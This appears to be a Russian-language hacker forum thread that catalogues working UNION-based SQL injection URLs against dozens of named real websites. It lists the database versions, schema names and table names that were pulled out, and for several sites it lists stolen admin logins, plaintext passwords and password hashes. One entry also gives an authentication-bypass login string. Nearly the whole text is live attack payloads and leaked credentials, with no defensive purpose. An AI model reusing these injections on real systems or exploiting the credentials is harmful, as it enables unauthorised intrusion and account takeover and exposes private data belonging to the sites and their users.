SQL Инъекции

http://www.detki-74.ru/gcards/getnewsitem.php?newsid=1+union+select+1,2,concat(username,char(45),userpass),4,5+FROM+gc_cardusers--

admin-3bb5029c0a7f3f6b81e744ea798e3d9d

 

http://www.dyadem.com/media/pr.php?id=-3909+union+selecT+1,2,3,4,concat_ws(0x3a,version(),user(),database())

4.1.22-community-nt:darren@localhost:cms

DocumentRoot: C:\Program Files\Apache Software Foundation\Apache2.2\htdocs

PR 5, ТИЦ 10

Антибайан: checked
----------------------------
http://www.ecpa.org/pr/pr.php?id=-95+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database()),8,9,10,11,12,13

4.0.27-max-log:[email protected]:ecpaweb

http://www.ecpa.org/pr/pr.php?id=-95+union+select+1,2,3,4,5,6,concat_ws(0x3a,username,password),8,9,10,11,12,13+from+admin

sheri:monday

PR 6

Антибайан: checked

--------------------------------------------

http://www.steinerbooks.org/p.php?id=-7+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9

4.1.22:anthroposophic@localhost:steinerbooks

PR 4
---------------------------------------------
http://www.mika-norilsk.ru/razdel.php?id=-19+union+selecT+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6

5.0.67-community:norilsk6_mainuse@localhost:norilsk6_mikanorilsk

http://www.mika-norilsk.ru/razdel.php?id=-19+union+selecT+1,table_name,3,4,5,6+from+information_schema.tables

http://www.mika-norilsk.ru/razdel.php?id=-19+union+selecT+1,concat_ws(0x3a,login,password),3,4,5,6+from+tab_admin

Userassword - 888:999
-------------------------------------

http://www.amadey-center.ru/razdel.php?id=-8+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5

4.1.22-log:[email protected]:wwwamadeycenterr_linkomp

-------------------------------------
http://www.pronv.com/razdel.php?id=-7+union+selecT+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9

4.1.22-MAX-LOG[email protected]RONV
------------------------------------

 

http://www.salisburycathedral.org.uk/news.php?id=-357+unioN+seLect+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,version(),19,20,21,22,23/*
Page Rank: 5
Database Version: 4.1.20
Database name: salisburycathedral
User name: salisburycathedr@localhost
tables:

Code:

homepage
links
log
news

http://www.ihrc.org.uk/show.php?id=-1412+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13--
Database Version: 4.0.27-standard-log
Database name: db120565932
User name: [email protected]
tables:

Code:

info

http://www.footballfoundation.com/news.php?id=-905+union+select+1,2,3,4,5,6,7--
Page Rank: 6
Database Version: 4.1.10a-log
Database name: nff
User name: nff@localhost
tables:

Code:

admin
news

http://audiobookdeals.com/audiobook-news-show.php?id=-43+union+select+1,version(),3,4--
Page Rank: 2
Database Version: 4.1.22
Database name: audioboo_content
User name: [email protected]
tables:

Code:

articles
news

 

http://photoloopa.com/en/index.razdel.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6

5.0.32-Debian_7etch6-log:[email protected]:z73749_main

есть таблица: psg_user, с кучей столбцов (46)

http://photoloopa.com/en/index.razdel.php?id=-1+union+select+1,2,3,4,column_name,6+from+information_schema.columns+where+table_name=0x7073675f7573657273+limit+46,1

http://photoloopa.com/en/index.razdel.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,first_name,password),6+from+psg_users
и т.д.

------------------------------
http://www.ruriders.com/statya.php?id=-15395+union+selecT+1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database()),8,9,10,11,12,13

5.0.77-log:m58187_uIbarbe@localhost:m58187_Ibarbero


ТИЦ 100
---------------------------------
http://www.papor.ru/statya.php?id=48+union+selecT+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11

5.0.70-log:dbu_ansimov_1@localhostp

тиц 10

 

PR 2

adminka - http://www.tutpricol.ru/admin/
login - admin
pass - sevagin

version() - 4.1.22-log
user() - tutpric5_root@localhost
database() - tutpric5_tutpricol

 

PR3

Code:

promocamp@localhost:promocamp:5.0.79

Tables:

 

http://www.hetkookatelier.nl/admin_view_image.php?cid=-99999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/lwsp_users

 

PR7
https://www.iifiir.org/en/news.php?rub=2+union+select+1,2,TABLE_NAME,4,5,6+from+information_schema.tables--&page=2&id=1871#2 union select 1,2,TABLE_NAME,4,5,6 from information_schema.tables--
Нужные таблы закрыты((

http://www.studio2.gr/studio2/newsen.php?id=-18+union+select+1,username,3,4,password+from+users/*
studio2::!studio_dyo!

 

ari.ru Агентство Русской Информации

Code:

http://ari.ru/publication/?id=-203+union+select+1,concat_ws(0x203a20,version(),database(),user(),@@version_compile_os)--

version():version():5.0.67
database():ariru3_
user():ariru3_ariru@localhost
os redhat-linux-gnu

выводим таблицы лимитом

Code:

http://ari.ru/publication/?id=-203+union+select+1,table_name+from+information_schema.tables+limit+15,1

таблица users

Code:

http://ari.ru/publication/?id=-203+union+select+1,table_name+from+information_schema.tables+limit+51,1

выводим юзверей лимитом

Code:

http://ari.ru/publication/?id=-203+union+select+1,concat(0x3a,nick,password)+from+users+limit+2,3

несколько юзверей:
Гром gridoza
Арт erasure
ИванЦ qawert
Виктор 198895
— Админ —Druzhinnik итд...

 

http://www.longwy.eu/index.php?pg=11&id=-517+union+select+1,2,group_concat(TABLE_NAME),4,5,6,7,8+from+information_schema.tables/*

http://www.art-ks.org/index.php?id=-153+union+select+1,2,3,concat(login,char(58),pwd),5,6,7,8,9,10+from+users/*
erhart::e10adc3949ba59abbe56e057f20f883e --123456

 

http://referat.by/subjects.php?btn=&level=2&subj=6&page=0&size=2&id=-152+union+select+1,2,3,4,5,concat_ws(0x3a3a,id,Name,Passwd,rights),7+from+accounts--
1::Andrew::5d266ec24ed1234fd0a41c45912090e4::000000000000

 

PR3

Utente7150:17634
Utente3501:232094168
Utente7232:661581938

 

http://www.alternativegrounds.com/show.php?ID=-20+union+select+1,2,3,4,5,6,7,8,9--
Page Rank: 4
Database Version: 4.0.18-Max
Database name: alternativegro
User name: [email protected]
PS ниодной таблы ненашел

 

Code:

http://www.ifesworld.org/news/item.php?itemID=-1523+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(),database(),user()),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--

5.0.77-community-log:xnjafc_ifesworld:xnjafc_ifesworld@localhost

таблы:

Code:

http://www.ifesworld.org/news/item.php?itemID=-1523+union+select+1,2,3,4,5,6,7,8,9,10,cast(group_concat(table_name)+as+binary),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+information_schema.tables--

_______

Code:

http://www.latrobe.edu.au/lupa/news-item.php?id=-30+union+select+1,2,concat_ws(0x3a,version(),database(),user())--

4.1.22-log:lupa:[email protected]
______

Code:

http://www.indstate.edu/news/news.php?newsid=-1785+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6--

5.0.45-community-nt-log:news:news@localhost

таблы:

Code:

CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,audiovideoarea,audiovideoaudience,audiovideoitem,dummy,experts_guide,memberaccess,newsarea,newsaudience,newslogin,newsmediaitem,newsmediatype,newspriority,newsstory,newsstoryarea,newsstoryaudience,newsstorymediaitem,photoarea,photoaudience,photoitem,presidentsearch,searchaudience,searchcomments,searchlogin,audiovideoarea,audiovideoaudience,audiovideoitem,dummy,experts_guide,memberaccess,newsarea,newsaudience,newslogin,newsmediaitem,newsmediatype,newspriority,newsstory,newsstoryarea,newsstoryaudience,newsstorymediaitem,photoarea,photoaudience,photoitem,presidentsearch,searchaudience,searchcomments,searchlogin

чуть-чуть акков (ID,username,password)

Code:

1:wherndon:Chuck1,
2:mlowry:camaroheaven,
3:jhiddle:dragon832,
4:dtaylor:rutabaga,
5:cdukate:patch03,
15:tford:cm1vp2,
7:pmeyer:cams2quik4u,
8:kspanuello:specialk,
31:sadla1:karuna,
25:tcampbell:nikond2x,
26:kberchem:Kosmo15,
30:jsicking:js8629

 

Code:

http://www.invivogen.com/family.php?ID=-97+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(0x3a,user(),database(),version()),16,17--

visiteur@localhost:invivo:4.1.22

 

http://www.bentel.ro/produse.php?idSubcategorie=3246&idProdus=-39409+union+select+concat_ws(0x3a,version(),database(),user(),@@version_compile_os),2


Database Version: 5.0.45
Database name: bentelsite
User name: bentelsite@localhost
Os:redhat-linux-gnu

 

PR 1

Вывод в <title> 4й ветка бд. таблицы ни одной не нашел
логин -1' or 1=1/*'
пас любой



jokester: ethaicd.com БОЯН, не нужно восстанавливать то, что я стираю

 

http://www.calcatinge.ro/index.php?idCategorie=47+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,Version(),Database(),User(),@@version_compile_os),0x71),0x71),2--%20&lang=ro

Database Version: 5.0.77
Database name: calcat_calcatinge
User name: calcat_root@localhost
Os: portbld-freebsd6.2

 

version 5.0.67-log
user [email protected]
database mintakafoundationorg

 

PR 3

Code:

http://www.globus.naztrans.ru/CityInfo.php?Number=-9600+union+select+concat_ws(0x202d20,version(),user(),database(),@@version_compile_os),2,3,4,5

user() - karalex_georg@localhost
version() - 5.0.67-community
database() - karalex_globus
os - redhat-linux-gnu


В бд ничего интересного...
Список автомобилей, фото иды, коменты, новости.

cities
authors
gallereies
news
pages
photos
results
usercoments
video
etc...